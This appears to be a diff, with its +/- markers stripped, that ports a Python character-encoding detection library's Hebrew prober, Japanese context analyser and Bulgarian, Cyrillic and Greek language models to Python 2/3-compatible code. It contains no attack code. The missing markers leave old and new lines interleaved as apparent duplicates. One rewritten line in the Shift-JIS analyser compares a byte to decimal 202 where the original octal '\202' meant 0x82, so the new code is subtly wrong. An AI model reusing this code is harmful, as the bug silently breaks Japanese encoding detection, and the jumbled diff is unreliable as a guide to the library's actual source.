# not aware of a BIDI rendering algorithm. The renderer sees the text and
# draws it from left to right. The text itself when ordered naturally is read
# backwards. A buffer of Visual Hebrew generally looks like so:
# "[last word of first line spelled backwards] [whole line ordered backwards
# and spelled backwards] [first word of first line spelled backwards]
# and spelled backwards] [first word of first line spelled backwards]
# [end of line] [last word of second line] ... etc' "
# adding punctuation marks, numbers and English text to visual text is
# naturally also "visual" and from left to right.
#
#
# "Logical" directionality means the text is ordered "naturally" according to
# the order it is read. It is the responsibility of the renderer to display
# the text from right to left. A BIDI algorithm is used to place general
# the order it is read. It is the responsibility of the renderer to display
# the text from right to left. A BIDI algorithm is used to place general
# punctuation marks, numbers and English text in the text.
#
# Texts in x-mac-hebrew are almost impossible to find on the Internet. From
# Texts in x-mac-hebrew are almost impossible to find on the Internet. From
# what little evidence I could find, it seems that its general directionality
# is Logical.
#
@ -76,17 +77,17 @@ import constants
# charsets:
# Visual Hebrew - "ISO-8859-8" - backwards text - Words and sentences are
# backwards while line order is natural. For charset recognition purposes
# the line order is unimportant (In fact, for this implementation, even
# the line order is unimportant (In fact, for this implementation, even
# word order is unimportant).
# Logical Hebrew - "windows-1255" - normal, naturally ordered text.
#
# "ISO-8859-8-I" is a subset of windows-1255 and doesn't need to be
# "ISO-8859-8-I" is a subset of windows-1255 and doesn't need to be
# specifically identified.
# "x-mac-hebrew" is also identified as windows-1255. A text in x-mac-hebrew
# that contain special punctuation marks or diacritics is displayed with
# some unconverted characters showing as question marks. This problem might
# be corrected using another model prober for x-mac-hebrew. Due to the fact
# that x-mac-hebrew texts are so rare, writing another model prober isn't
# that x-mac-hebrew texts are so rare, writing another model prober isn't
# worth the effort and performance hit.
#
#### The Prober ####
@ -126,28 +127,31 @@ import constants
# charset identified, either "windows-1255" or "ISO-8859-8".
# windows-1255 / ISO-8859-8 code points of interest
FINAL_KAF = '\xea'
NORMAL_KAF = '\xeb'
FINAL_MEM = '\xed'
NORMAL_MEM = '\xee'
FINAL_NUN = '\xef'
NORMAL_NUN = '\xf0'
FINAL_PE = '\xf3'
NORMAL_PE = '\xf4'
FINAL_TSADI = '\xf5'
NORMAL_TSADI = '\xf6'
FINAL_KAF = 0xea
NORMAL_KAF = 0xeb
FINAL_MEM = 0xed
NORMAL_MEM = 0xee
FINAL_NUN = 0xef
NORMAL_NUN = 0xf0
FINAL_PE = 0xf3
NORMAL_PE = 0xf4
FINAL_TSADI = 0xf5
NORMAL_TSADI = 0xf6
# Minimum Visual vs Logical final letter score difference.
# If the difference is below this, don't rely solely on the final letter score distance.
# If the difference is below this, don't rely solely on the final letter score
# distance.
MIN_FINAL_CHAR_DISTANCE = 5
# Minimum Visual vs Logical model score difference.
# If the difference is below this, don't rely at all on the model score distance.
# If the difference is below this, don't rely at all on the model score
# distance.
MIN_MODEL_DISTANCE = 0.01
VISUAL_HEBREW_NAME = "ISO-8859-8"
LOGICAL_HEBREW_NAME = "windows-1255"
class HebrewProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
@ -159,8 +163,8 @@ class HebrewProber(CharSetProber):
self._mFinalCharLogicalScore = 0
self._mFinalCharVisualScore = 0
# The two last characters seen in the previous buffer,
# mPrev and mBeforePrev are initialized to space in order to simulate a word
# delimiter at the beginning of the data
# mPrev and mBeforePrev are initialized to space in order to simulate
# a word delimiter at the beginning of the data
self._mPrev = ' '
self._mBeforePrev = ' '
# These probers are owned by the group prober.
@ -170,49 +174,52 @@ class HebrewProber(CharSetProber):
self._mVisualProber = visualProber
def is_final(self, c):
return c in [FINAL_KAF, FINAL_MEM, FINAL_NUN, FINAL_PE, FINAL_TSADI]
return wrap_ord(c) in [FINAL_KAF, FINAL_MEM, FINAL_NUN, FINAL_PE,
FINAL_TSADI]
def is_non_final(self, c):
# The normal Tsadi is not a good Non-Final letter due to words like
# 'lechotet' (to chat) containing an apostrophe after the tsadi. This
# apostrophe is converted to a space in FilterWithoutEnglishLetters causing
# the Non-Final tsadi to appear at an end of a word even though this is not
# the case in the original text.
# The letters Pe and Kaf rarely display a related behavior of not being a
# good Non-Final letter. Words like 'Pop', 'Winamp' and 'Mubarak' for
# example legally end with a Non-Final Pe or Kaf. However, the benefit of
# these letters as Non-Final letters outweighs the damage since these words
# are quite rare.
return c in [NORMAL_KAF, NORMAL_MEM, NORMAL_NUN, NORMAL_PE]
# The normal Tsadi is not a good Non-Final letter due to words like
# 'lechotet' (to chat) containing an apostrophe after the tsadi. This
# apostrophe is converted to a space in FilterWithoutEnglishLetters
# causing the Non-Final tsadi to appear at an end of a word even
# though this is not the case in the original text.
# The letters Pe and Kaf rarely display a related behavior of not being
# a good Non-Final letter. Words like 'Pop', 'Winamp' and 'Mubarak'
# for example legally end with a Non-Final Pe or Kaf. However, the
# benefit of these letters as Non-Final letters outweighs the damage
# since these words are quite rare.
return wrap_ord(c) in [NORMAL_KAF, NORMAL_MEM, NORMAL_NUN, NORMAL_PE]
def feed(self, aBuf):
# Final letter analysis for logical-visual decision.
# Look for evidence that the received buffer is either logical Hebrew or
# visual Hebrew.
# Look for evidence that the received buffer is either logical Hebrew
# or visual Hebrew.
# The following cases are checked:
# 1) A word longer than 1 letter, ending with a final letter. This is an
# indication that the text is laid out "naturally" since the final letter
# really appears at the end. +1 for logical score.
# 2) A word longer than 1 letter, ending with a Non-Final letter. In normal
# Hebrew, words ending with Kaf, Mem, Nun, Pe or Tsadi, should not end with
# the Non-Final form of that letter. Exceptions to this rule are mentioned
# above in isNonFinal(). This is an indication that the text is laid out
# backwards. +1 for visual score
# 3) A word longer than 1 letter, starting with a final letter. Final letters
# should not appear at the beginning of a word. This is an indication that
# the text is laid out backwards. +1 for visual score.
#
# The visual score and logical score are accumulated throughout the text and
# are finally checked against each other in GetCharSetName().
# No checking for final letters in the middle of words is done since that case
# is not an indication for either Logical or Visual text.
#
# We automatically filter out all 7-bit characters (replace them with spaces)
# so the word boundary detection works properly. [MAP]
# 1) A word longer than 1 letter, ending with a final letter. This is
# an indication that the text is laid out "naturally" since the
# final letter really appears at the end. +1 for logical score.
# 2) A word longer than 1 letter, ending with a Non-Final letter. In
# normal Hebrew, words ending with Kaf, Mem, Nun, Pe or Tsadi,
# should not end with the Non-Final form of that letter. Exceptions
# to this rule are mentioned above in isNonFinal(). This is an
# indication that the text is laid out backwards. +1 for visual
# score
# 3) A word longer than 1 letter, starting with a final letter. Final
# letters should not appear at the beginning of a word. This is an
# indication that the text is laid out backwards. +1 for visual
# score.
#
# The visual score and logical score are accumulated throughout the
# text and are finally checked against each other in GetCharSetName().
# No checking for final letters in the middle of words is done since
# that case is not an indication for either Logical or Visual text.
#
# We automatically filter out all 7-bit characters (replace them with
# spaces) so the word boundary detection works properly. [MAP]
if self.get_state() == constants.eNotMe:
if self.get_state() == eNotMe:
# Both model probers say it's not them. No reason to continue.
return constants.eNotMe
return eNotMe
aBuf = self.filter_high_bit_only(aBuf)
@ -220,23 +227,27 @@ class HebrewProber(CharSetProber):
if cur == ' ':
# We stand on a space - a word just ended
if self._mBeforePrev != ' ':
# next-to-last char was not a space so self._mPrev is not a 1 letter word
# next-to-last char was not a space so self._mPrev is not a
# 1 letter word
if self.is_final(self._mPrev):
# case (1) [-2:not space][-1:final letter][cur:space]
self._mFinalCharLogicalScore += 1
elif self.is_non_final(self._mPrev):
# case (2) [-2:not space][-1:Non-Final letter][cur:space]
# case (2) [-2:not space][-1:Non-Final letter][
# cur:space]
self._mFinalCharVisualScore += 1
else:
# Not standing on a space
if (self._mBeforePrev == ' ') and (self.is_final(self._mPrev)) and (cur != ' '):
if ((self._mBeforePrev == ' ') and
(self.is_final(self._mPrev)) and (cur != ' ')):
# case (3) [-2:space][-1:final letter][cur:not space]
self._mFinalCharVisualScore += 1
self._mBeforePrev = self._mPrev
self._mPrev = cur
# Forever detecting, till the end or until both model probers return eNotMe (handled above)
return constants.eDetecting
# Forever detecting, till the end or until both model probers return
# eNotMe (handled above)
return eDetecting
def get_charset_name(self):
# Make the decision: is it Logical or Visual?
@ -248,22 +259,25 @@ class HebrewProber(CharSetProber):
return VISUAL_HEBREW_NAME
# It's not dominant enough, try to rely on the model scores instead.
modelsub = self._mLogicalProber.get_confidence() - self._mVisualProber.get_confidence()
modelsub = (self._mLogicalProber.get_confidence()
- self._mVisualProber.get_confidence())
if modelsub > MIN_MODEL_DISTANCE:
return LOGICAL_HEBREW_NAME
if modelsub < -MIN_MODEL_DISTANCE:
return VISUAL_HEBREW_NAME
# Still no good, back to final letter distance, maybe it'll save the day.
# Still no good, back to final letter distance, maybe it'll save the
# day.
if finalsub < 0.0:
return VISUAL_HEBREW_NAME
# (finalsub > 0 - Logical) or (don't know what to do) default to Logical.
# (finalsub > 0 - Logical) or (don't know what to do) default to
# Logical.
return LOGICAL_HEBREW_NAME
def get_state(self):
# Remain active as long as any of the model probers are active.
if (self._mLogicalProber.get_state() == constants.eNotMe) and \
(self._mVisualProber.get_state() == constants.eNotMe):
return constants.eNotMe
return constants.eDetecting
if (self._mLogicalProber.get_state() == eNotMe) and \
(self._mVisualProber.get_state() == eNotMe):
return eNotMe
return eDetecting

View File

@ -13,12 +13,12 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
@ -28,7 +28,7 @@
# Sampling from about 20M text materials include literature and computer technology
#
# Japanese frequency table, applied to both S-JIS and EUC-JP
# They are sorted in order.
# They are sorted in order.
# 128 --> 0.77094
# 256 --> 0.85710
@ -38,15 +38,15 @@
#
# Ideal Distribution Ratio = 0.92635 / (1-0.92635) = 12.58
# Random Distribution Ration = 512 / (2965+62+83+86-512) = 0.191
#
# Typical Distribution Ratio, 25% of IDR
#
# Typical Distribution Ratio, 25% of IDR
JIS_TYPICAL_DISTRIBUTION_RATIO = 3.0
# Char to FreqOrder table ,
# Char to FreqOrder table ,
JIS_TABLE_SIZE = 4368
JISCharToFreqOrder = ( \
JISCharToFreqOrder = (
40, 1, 6, 182, 152, 180, 295,2127, 285, 381,3295,4304,3068,4606,3165,3510, # 16
3511,1822,2785,4607,1193,2226,5070,4608, 171,2996,1247, 18, 179,5071, 856,1661, # 32
1262,5072, 619, 127,3431,3512,3230,1899,1700, 232, 228,1294,1298, 284, 283,2041, # 48
@ -565,3 +565,5 @@ JISCharToFreqOrder = ( \
8224,8225,8226,8227,8228,8229,8230,8231,8232,8233,8234,8235,8236,8237,8238,8239, # 8240
8240,8241,8242,8243,8244,8245,8246,8247,8248,8249,8250,8251,8252,8253,8254,8255, # 8256
8256,8257,8258,8259,8260,8261,8262,8263,8264,8265,8266,8267,8268,8269,8270,8271) # 8272
# flake8: noqa

View File

@ -13,19 +13,19 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
from .compat import wrap_ord
NUM_OF_CATEGORY = 6
DONT_KNOW = -1
@ -34,7 +34,7 @@ MAX_REL_THRESHOLD = 1000
MINIMUM_DATA_THRESHOLD = 4
# This is hiragana 2-char sequence table, the number in each cell represents its frequency category
jp2CharContext = ( \
jp2CharContext = (
(0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1),
(2,4,0,4,0,3,0,4,0,3,4,4,4,2,4,3,3,4,3,2,3,3,4,2,3,3,3,2,4,1,4,3,3,1,5,4,3,4,3,4,3,5,3,0,3,5,4,2,0,3,1,0,3,3,0,3,3,0,1,1,0,4,3,0,3,3,0,4,0,2,0,3,5,5,5,5,4,0,4,1,0,3,4),
(0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2),
@ -125,24 +125,31 @@ class JapaneseContextAnalysis:
self.reset()
def reset(self):
self._mTotalRel = 0 # total sequence received
self._mRelSample = [0] * NUM_OF_CATEGORY # category counters, each interger counts sequence in its category
self._mNeedToSkipCharNum = 0 # if last byte in current buffer is not the last byte of a character, we need to know how many bytes to skip in next buffer
self._mLastCharOrder = -1 # The order of previous char
self._mDone = constants.False # If this flag is set to constants.True, detection is done and conclusion has been made
self._mTotalRel = 0 # total sequence received
# category counters, each interger counts sequence in its category
self._mRelSample = [0] * NUM_OF_CATEGORY
# if last byte in current buffer is not the last byte of a character,
# we need to know how many bytes to skip in next buffer
self._mNeedToSkipCharNum = 0
self._mLastCharOrder = -1 # The order of previous char
# If this flag is set to True, detection is done and conclusion has
# been made
self._mDone = False
def feed(self, aBuf, aLen):
if self._mDone: return
if self._mDone:
return
# The buffer we got is byte oriented, and a character may span in more than one
# buffers. In case the last one or two byte in last buffer is not complete, we
# record how many byte needed to complete that character and skip these bytes here.
# We can choose to record those bytes as well and analyse the character once it
# is complete, but since a character will not make much difference, by simply skipping
# buffers. In case the last one or two byte in last buffer is not
# complete, we record how many byte needed to complete that character
# and skip these bytes here. We can choose to record those bytes as
# well and analyse the character once it is complete, but since a
# character will not make much difference, by simply skipping
# this character will simply our logic and improve performance.
i = self._mNeedToSkipCharNum
while i < aLen:
order, charLen = self.get_order(aBuf[i:i+2])
order, charLen = self.get_order(aBuf[i:i + 2])
i += charLen
if i > aLen:
self._mNeedToSkipCharNum = i - aLen
@ -151,7 +158,7 @@ class JapaneseContextAnalysis:
if (order != -1) and (self._mLastCharOrder != -1):
self._mTotalRel += 1
if self._mTotalRel > MAX_REL_THRESHOLD:
self._mDone = constants.True
self._mDone = True
break
self._mRelSample[jp2CharContext[self._mLastCharOrder][order]] += 1
self._mLastCharOrder = order
@ -166,45 +173,55 @@ class JapaneseContextAnalysis:
else:
return DONT_KNOW
def get_order(self, aStr):
def get_order(self, aBuf):
return -1, 1
class SJISContextAnalysis(JapaneseContextAnalysis):
def get_order(self, aStr):
if not aStr: return -1, 1
def __init__(self):
self.charset_name = "SHIFT_JIS"
def get_charset_name(self):
return self.charset_name
def get_order(self, aBuf):
if not aBuf:
return -1, 1
# find out current char's byte length
if ((aStr[0] >= '\x81') and (aStr[0] <= '\x9F')) or \
((aStr[0] >= '\xE0') and (aStr[0] <= '\xFC')):
first_char = wrap_ord(aBuf[0])
if ((0x81 <= first_char <= 0x9F) or (0xE0 <= first_char <= 0xFC)):
charLen = 2
if (first_char == 0x87) or (0xFA <= first_char <= 0xFC):
self.charset_name = "CP932"
else:
charLen = 1
# return its order if it is hiragana
if len(aStr) > 1:
if (aStr[0] == '\202') and \
(aStr[1] >= '\x9F') and \
(aStr[1] <= '\xF1'):
return ord(aStr[1]) - 0x9F, charLen
if len(aBuf) > 1:
second_char = wrap_ord(aBuf[1])
if (first_char == 202) and (0x9F <= second_char <= 0xF1):
return second_char - 0x9F, charLen
return -1, charLen
class EUCJPContextAnalysis(JapaneseContextAnalysis):
def get_order(self, aStr):
if not aStr: return -1, 1
def get_order(self, aBuf):
if not aBuf:
return -1, 1
# find out current char's byte length
if (aStr[0] == '\x8E') or \
((aStr[0] >= '\xA1') and (aStr[0] <= '\xFE')):
first_char = wrap_ord(aBuf[0])
if (first_char == 0x8E) or (0xA1 <= first_char <= 0xFE):
charLen = 2
elif aStr[0] == '\x8F':
elif first_char == 0x8F:
charLen = 3
else:
charLen = 1
# return its order if it is hiragana
if len(aStr) > 1:
if (aStr[0] == '\xA4') and \
(aStr[1] >= '\xA1') and \
(aStr[1] <= '\xF3'):
return ord(aStr[1]) - 0xA1, charLen
if len(aBuf) > 1:
second_char = wrap_ord(aBuf[1])
if (first_char == 0xA4) and (0xA1 <= second_char <= 0xF3):
return second_char - 0xA1, charLen
return -1, charLen
# flake8: noqa

View File

@ -13,30 +13,28 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# Character Mapping Table:
# this table is modified base on win1251BulgarianCharToOrderMap, so
# this table is modified base on win1251BulgarianCharToOrderMap, so
# only number <64 is sure valid
Latin5_BulgarianCharToOrderMap = ( \
Latin5_BulgarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -55,7 +53,7 @@ Latin5_BulgarianCharToOrderMap = ( \
62,242,243,244, 58,245, 98,246,247,248,249,250,251, 91,252,253, # f0
)
win1251BulgarianCharToOrderMap = ( \
win1251BulgarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -74,13 +72,13 @@ win1251BulgarianCharToOrderMap = ( \
7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,253, 42, 16, # f0
)
# Model Table:
# Model Table:
# total sequences: 100%
# first 512 sequences: 96.9392%
# first 1024 sequences:3.0618%
# rest sequences: 0.2992%
# negative sequences: 0.0020%
BulgarianLangModel = ( \
# negative sequences: 0.0020%
BulgarianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,3,3,3,3,3,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,2,2,1,2,2,
3,1,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,0,1,
@ -211,18 +209,21 @@ BulgarianLangModel = ( \
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
)
Latin5BulgarianModel = { \
Latin5BulgarianModel = {
'charToOrderMap': Latin5_BulgarianCharToOrderMap,
'precedenceMatrix': BulgarianLangModel,
'mTypicalPositiveRatio': 0.969392,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "ISO-8859-5"
}
Win1251BulgarianModel = { \
Win1251BulgarianModel = {
'charToOrderMap': win1251BulgarianCharToOrderMap,
'precedenceMatrix': BulgarianLangModel,
'mTypicalPositiveRatio': 0.969392,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "windows-1251"
}
# flake8: noqa

View File

@ -13,23 +13,21 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
# KOI8-R language model
# Character Mapping Table:
KOI8R_CharToOrderMap = ( \
KOI8R_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -48,7 +46,7 @@ KOI8R_CharToOrderMap = ( \
35, 43, 45, 32, 40, 52, 56, 33, 61, 62, 51, 57, 47, 63, 50, 70, # f0
)
win1251_CharToOrderMap = ( \
win1251_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -67,7 +65,7 @@ win1251_CharToOrderMap = ( \
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
)
latin5_CharToOrderMap = ( \
latin5_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -86,7 +84,7 @@ latin5_CharToOrderMap = ( \
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
macCyrillic_CharToOrderMap = ( \
macCyrillic_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -105,7 +103,7 @@ macCyrillic_CharToOrderMap = ( \
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27,255,
)
IBM855_CharToOrderMap = ( \
IBM855_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -124,7 +122,7 @@ IBM855_CharToOrderMap = ( \
250, 18, 62, 20, 51, 25, 57, 30, 47, 29, 63, 22, 50,251,252,255,
)
IBM866_CharToOrderMap = ( \
IBM866_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -143,13 +141,13 @@ IBM866_CharToOrderMap = ( \
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
# Model Table:
# Model Table:
# total sequences: 100%
# first 512 sequences: 97.6601%
# first 1024 sequences: 2.3389%
# rest sequences: 0.1237%
# negative sequences: 0.0009%
RussianLangModel = ( \
# negative sequences: 0.0009%
RussianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,1,3,3,3,3,1,3,3,3,2,3,2,3,3,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,2,2,2,2,2,0,0,2,
3,3,3,2,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,2,3,2,0,
@ -280,50 +278,52 @@ RussianLangModel = ( \
0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,
)
Koi8rModel = { \
Koi8rModel = {
'charToOrderMap': KOI8R_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "KOI8-R"
}
Win1251CyrillicModel = { \
Win1251CyrillicModel = {
'charToOrderMap': win1251_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "windows-1251"
}
Latin5CyrillicModel = { \
Latin5CyrillicModel = {
'charToOrderMap': latin5_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "ISO-8859-5"
}
MacCyrillicModel = { \
MacCyrillicModel = {
'charToOrderMap': macCyrillic_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "MacCyrillic"
};
Ibm866Model = { \
Ibm866Model = {
'charToOrderMap': IBM866_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "IBM866"
}
Ibm855Model = { \
Ibm855Model = {
'charToOrderMap': IBM855_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "IBM855"
}
# flake8: noqa

View File

@ -13,27 +13,25 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# Character Mapping Table:
Latin7_CharToOrderMap = ( \
Latin7_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -52,7 +50,7 @@ Latin7_CharToOrderMap = ( \
9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0
)
win1253_CharToOrderMap = ( \
win1253_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -71,13 +69,13 @@ win1253_CharToOrderMap = ( \
9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0
)
# Model Table:
# Model Table:
# total sequences: 100%
# first 512 sequences: 98.2851%
# first 1024 sequences:1.7001%
# rest sequences: 0.0359%
# negative sequences: 0.0148%
GreekLangModel = ( \
# negative sequences: 0.0148%
GreekLangModel = (
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,2,2,3,3,3,3,3,3,3,3,1,3,3,3,0,2,2,3,3,0,3,0,3,2,0,3,3,3,0,
@ -208,18 +206,20 @@ GreekLangModel = ( \
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
)
Latin7GreekModel = { \
Latin7GreekModel = {
'charToOrderMap': Latin7_CharToOrderMap,
'precedenceMatrix': GreekLangModel,
'mTypicalPositiveRatio': 0.982851,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "ISO-8859-7"
}
Win1253GreekModel = { \
Win1253GreekModel = {
'charToOrderMap': win1253_CharToOrderMap,
'precedenceMatrix': GreekLangModel,
'mTypicalPositiveRatio': 0.982851,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "windows-1253"
}
# flake8: noqa

View File

@ -15,20 +15,18 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
@ -36,7 +34,7 @@ import constants
# Windows-1255 language model
# Character Mapping Table:
win1255_CharToOrderMap = ( \
win1255_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
